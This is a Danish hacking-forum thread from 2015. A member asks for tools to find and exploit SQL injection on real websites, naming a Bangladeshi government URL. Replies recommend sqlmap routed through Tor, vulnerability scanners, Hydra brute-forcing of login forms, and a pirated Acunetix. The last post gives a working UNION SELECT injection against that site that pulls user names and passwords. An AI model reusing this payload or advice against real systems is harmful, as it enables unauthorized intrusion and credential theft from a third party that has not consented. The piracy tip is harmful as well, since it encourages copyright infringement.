Sql
|
16-06-2015, 21:37
(Denne besked var sidst ændret: 17-06-2015, 00:05 af Doctor Blue.)
|
|||
|
|||
Sql
Hej folkens derude, det var lige bare en side jeg fandt tilfældigt.
Men kunne det lykkedes at komme ind i sådan Admin panel?? Generelt bruger jeg Kali Linux. Ville gerne have hjælp til at finde en " scanner " der kan give mig vuln til de forskellige danske sites? Eksempel : www.bdp.gov.bd http://www.bdp.gov.bd/index.php?id=56 <----sqli vulns Takker der ude ;) Håber nogen kan hjælpe :) Kind regards Mamo |
|||
17-06-2015, 01:59
(Denne besked var sidst ændret: 17-06-2015, 02:14 af iTick.)
|
|||
|
|||
RE: Sql
(16-06-2015, 21:37)AnonymousDk Skrev: Hej folkens derude, det var lige bare en side jeg fandt tilfældigt. Tænker du på noget der kan scanne efter sårbare hjemmesider, eller noget der kan hjælpe dig med at udnytte fejl i en side, du allerede har fundet? "sqlmap" er rimelig godt og rimelig automatiseret.., og kan køre gennem Tor. :) Der er en del forskellige. Du kan lure lidt på http://tools.kali.org/tools-listing og se hvad der er. PS: Siden er vist ved at blive opdateret lige nu. Der er selvfølgelig også w3af, som også er i Kali. Eller i hvert fald i deres repository. EDIT: Diverse ting rettet.. EDIT2: Du kan evt. lure BigJs post fra den anden dag, hvor han bruger Hydra til at bruteforce noget web halløj. Det kunne have været et Admin Panel. Det kunne godt være en login form. Det er godt nok ikke en guide, men det kan nok bruges: https://shellsec.pw/traad-thc-hydra-bruteforce
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick |
|||
17-06-2015, 02:04
|
|||
|
|||
RE: Sql
https://subgraph.com/vega/index.en.html er en "okay" scanner, den finder xss, sqli og mange andre ting
Men du skal selv sortere en del i de ting den finder |
|||
17-06-2015, 11:12
(Denne besked var sidst ændret: 17-06-2015, 11:12 af AnonymousDk.)
|
|||
|
|||
RE: Sql
(17-06-2015, 01:59)iTick Skrev: Tænker du på noget der kan scanne efter sårbare hjemmesider, eller noget der kan hjælpe dig med at udnytte fejl i en side, du allerede har fundet? Ja præcis takker for det, jeg tænkte også på at udnytte en fejl på en side eller noget lign. skriver senere på dagen til dig... (17-06-2015, 02:04)M€k4 Skrev: https://subgraph.com/vega/index.en.html er en "okay" scanner, den finder xss, sqli og mange andre ting takker for det |
|||
17-06-2015, 12:33
|
|||
|
|||
RE: Sql
Det lyder som om du søger en simpel dork scamnner, til brug på Google eller Bing. Det baserer jeg på det eksempel du gav.
Hvis det er til udnyttelse af fejlene, så er SQLMap eller SQLNinja helt klart heavy-weighters inden for dette felt. Hvis du leder efter generelle scanners, så er der et utal af forskellige i Kali, som alle kan bruges forskelligt, og hver har deres fordele og ulemper. Jeg skal dog være ærlig og påstå, at jeg endnu ikke er stødt på noget der er bare i nærheden af Acunetix' WV Scanner. Også selvom der er udemærkede alternativer - også open-source. Hvis du ikke frygter manuelt arbejde, så kom igang med Burp, Charles eller en anden proxy. |
|||
17-06-2015, 14:21
|
|||
|
|||
RE: Sql
(17-06-2015, 12:33)MalcolmXI Skrev: ... Jeg har vist aldrig prøvet Acunetix tool. Er der en gratis udgave af det? Jeg kiggede lige på deres hjemmeside, og jeg var godt nok ikke specielt grundig, men synes kun jeg kunne finde en trial. Det kan selvfølgelig også være nok til, lige at prøve det.
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick |
|||
17-06-2015, 15:07
|
|||
|
|||
RE: Sql
(17-06-2015, 14:21)iTick Skrev: Jeg har vist aldrig prøvet Acunetix tool. Er der en gratis udgave af det? Jeg kiggede lige på deres hjemmeside, og jeg var godt nok ikke specielt grundig, men synes kun jeg kunne finde en trial. Det kan selvfølgelig også være nok til, lige at prøve det. Jeg vil anbefale, at du sætter en virtualbox op med windows og henter en cracked version på the pirate bay (vælg naturligvis 9.5 frem for tidligere). Bare husk at gøre det i en virtualbox, da der er en stor del ekstra snavs i den, som du ikke har lyst til at køre på din egen pc :D
GOOD LUCK EBOLA-CHAN
I LOVE YOU EBOLA-CHAN |
|||
17-06-2015, 15:17
|
|||
|
|||
RE: Sql
(17-06-2015, 15:07)R3dpill Skrev: Jeg vil anbefale, at du sætter en virtualbox op med windows og henter en cracked version på the pirate bay (vælg naturligvis 9.5 frem for tidligere). Bare husk at gøre det i en virtualbox, da der er en stor del ekstra snavs i den, som du ikke har lyst til at køre på din egen pc :D Det er selvfølgelig en mulighed. :) Det har du nok helt ret i. :) Jeg ville i hvert fald forvente, der var proppet noget ekstra i. Det er i hvert fald meget normalt.
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick |
|||
17-06-2015, 21:26
|
|||
|
|||
RE: Sql
(17-06-2015, 12:33)MalcolmXI Skrev: Det lyder som om du søger en simpel dork scamnner, til brug på Google eller Bing. Det baserer jeg på det eksempel du gav. Sender dig lige en pm, takker for dit post |
|||
18-06-2015, 10:41
|
|||
|
|||
RE: Sql
Den er pænt easy den sql vuln du har givet.
Kode: http://www.bdp.gov.bd/index.php?id=-56' UNION SELECT 1,group_concat(user,0x3a,pass),3,4,5,6,7,8,9,10,11,12 from user--+ |
|||
|
User(s) browsing this thread: 1 Gæst(er)